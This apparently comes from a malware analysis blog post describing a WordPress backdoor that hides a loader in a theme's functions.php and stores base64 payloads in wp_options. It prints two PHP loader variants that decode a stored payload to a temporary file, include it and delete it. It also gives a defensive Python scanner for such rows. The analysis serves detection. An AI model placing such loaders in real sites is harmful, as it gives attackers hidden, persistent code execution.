Functions.php contains backdoor

This malware is clever because it hides its payload data inside the WordPress database and its own loader code in the theme's functions.php file. An attacker or botnet can send POST data at any time to update the payload or add new data to the database.

At the same time, it writes the payload data to a PHP script, which is loaded and executed; as its last command, it unlinks (deletes) itself again.

This malware hides inside the theme's functions.php file.

Functions.php

Data inside database

It also base64-encodes the data and stores it in the database's wp_options table, where it is difficult to find.

wp_options

Another detail: the text is base64 encoded, but it also includes spaces:

base64 encoded

We found two versions of this malware's encoded data in the database:

function-sync.php

        include $_SERVER["DOCUMENT_ROOT"]."/wp-config.php";
        $conn = mysqli_connect(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
        $sql = "SELECT * FROM  ".$table_prefix."options where option_name='function-sync'";
        $result = mysqli_query($conn, $sql);
        while($row = mysqli_fetch_assoc($result)) {
            $data = $row[option_value];
        }
        chmod("/home/malware.expert/public_html/wp-temporary.php", 0644);
        file_put_contents("/home/malware.expert/public_html/wp-temporary.php",base64_decode(str_replace(" ","",$data)));
        include "/home/malware.expert/public_html"."/wp-temporary.php";
        unlink("/home/malware.expert/public_html"."/wp-temporary.php");

content-wp-reload.php

        include $_SERVER["DOCUMENT_ROOT"]."/wp-config.php";
        $conn = mysqli_connect(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
        $sql = "SELECT * FROM  ".$table_prefix."options where option_name='content-wp-reload'";
        $result = mysqli_query($conn, $sql);
        while($row = mysqli_fetch_assoc($result)) {
            $data = $row[option_value];
        }
        chmod("/home/malware.expert/public_html/wp-temporary.php", 0644);
        file_put_contents("/home/malware.expert/public_html/wp-temporary.php",base64_decode(str_replace(" ","",$data)));
        include "/home/malware.expert/public_html"."/wp-temporary.php";
        unlink("/home/malware.expert/public_html"."/wp-temporary.php");
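
A defender-side check for the storage trick described above, as an added example that is not part of the original post: it scans exported wp_options rows for the two option names shown in the listings and for values that decode to PHP once spaces are stripped. The sample rows, the marker list and the function names are constructed for illustration.

```python
import base64
import re

# Option names used by the two loader variants listed on this page.
KNOWN_OPTION_NAMES = {"function-sync", "content-wp-reload"}
# Base64 alphabet plus the embedded spaces the loader strips before decoding.
SPACED_B64 = re.compile(r"[A-Za-z0-9+/ ]+={0,2}")
# Assumed heuristic: byte markers that suggest the decoded value is PHP source.
PHP_MARKERS = (b"<?php", b"eval(", b"base64_decode(")

def decode_spaced_base64(value):
    """Return decoded bytes if value is base64 once spaces are removed, else None."""
    text = value.strip()
    if len(text) < 16 or not SPACED_B64.fullmatch(text):
        return None
    try:
        return base64.b64decode(text.replace(" ", ""), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None

def scan_options(rows):
    """rows: iterable of (option_name, option_value); returns [(name, reasons)]."""
    findings = []
    for name, value in rows:
        reasons = []
        if name in KNOWN_OPTION_NAMES:
            reasons.append("option name used by this loader")
        decoded = decode_spaced_base64(value)
        # Plain text can decode "validly" by accident, so require PHP markers.
        if decoded and any(marker in decoded for marker in PHP_MARKERS):
            reasons.append("base64 (spaces stripped) decodes to PHP")
        if reasons:
            findings.append((name, reasons))
    return findings

def spaced(raw, every=8):
    """Build a constructed sample: base64 text broken up with spaces."""
    encoded = base64.b64encode(raw).decode()
    return " ".join(encoded[i:i + every] for i in range(0, len(encoded), every))

# Constructed rows standing in for an export of wp_options (harmless payloads).
SAMPLE_ROWS = [
    ("blogdescription", "Just another WordPress site"),
    ("function-sync", spaced(b"<?php echo 'constructed sample'; ?>")),
    ("theme_mods_example", spaced(b"<?php /* constructed */ ?>")),
]

if __name__ == "__main__":
    print(*scan_options(SAMPLE_ROWS), sep="\n")
```

The blogdescription row shows why decoding alone is not enough: ordinary text made of letters and spaces can pass base64 validation, so only values that decode to PHP are reported.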

Malware Expert Signature

Our FREE Malware Expert Signatures found this malware.